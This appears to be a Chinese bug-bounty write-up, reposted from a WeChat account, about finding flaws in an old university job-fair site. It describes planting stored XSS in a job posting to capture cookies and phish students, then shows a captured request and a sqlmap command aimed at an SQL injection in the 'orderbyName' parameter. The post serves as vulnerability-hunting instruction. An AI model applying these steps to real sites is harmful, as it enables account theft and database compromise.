漏洞挖掘—隐藏资产挖掘SQL注入

    利用注册页面进行注册，注册时需要填入统一社会信用代码和公司名称，这里面我直接使用工具生成了一个公司名称是我乱编的。

    成功注册登录之后，发现功能点也很少，但是好在站点比较老旧，感觉很容易出洞。在点击 “招聘会企业报名” 中发现可以发布招聘信息，尝试在招聘信息中插入XSS语句。

    成功添加后重新点击“招聘会信息”成功触发XSS，可获取用户cookie。

    因为是企业发布招聘信息，所以学生是能看到的，这里我更改了一下XSS语句，配置XSS接收平台，可以利用漏洞进行钓鱼攻击。

    到这里就已经出洞了，但储存型XSS在EDU SRC里面只能算是一个低危，只有1rank，肯定不能到此为止啊。继续查看功能点，在 “我的招聘会信息” 中发现了一个查询的功能点，企业名称输入任意值，发送数据包利用burp进行抓包。

    流量包大概是下面这个样子的（关键信息已删除或者替换），使用了POST传参，其中有一个参数名为 “orderbyName” 而且参数为 “desc”，这很难不让联想到这里会不会存在SQL注入漏洞，于是对参数进行闭合发现成功报错，回显报错信息判断为Oracle数据库。

POST /JiuYe/XXX/XXX/myjiuye.jsp HTTP/1.1Host: xxx.xxx.edu.cnCookie: JSESSIONID=89D3336C7289863A296EDFBA59839AB7-n1.tomcat1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1Connection: closeorderbyName=desc

    确实不太清楚Oracle数据库的SQL语句，直接保存请求包修改一下，只保留orderbyName参数，利用sqlmap工具进行测试。

sqlmap -r sql.txt --batch -p "orderbyName" --dbms=oracle

原文始发于微信公众号（网安日记本）：漏洞挖掘—隐藏资产挖掘SQL注入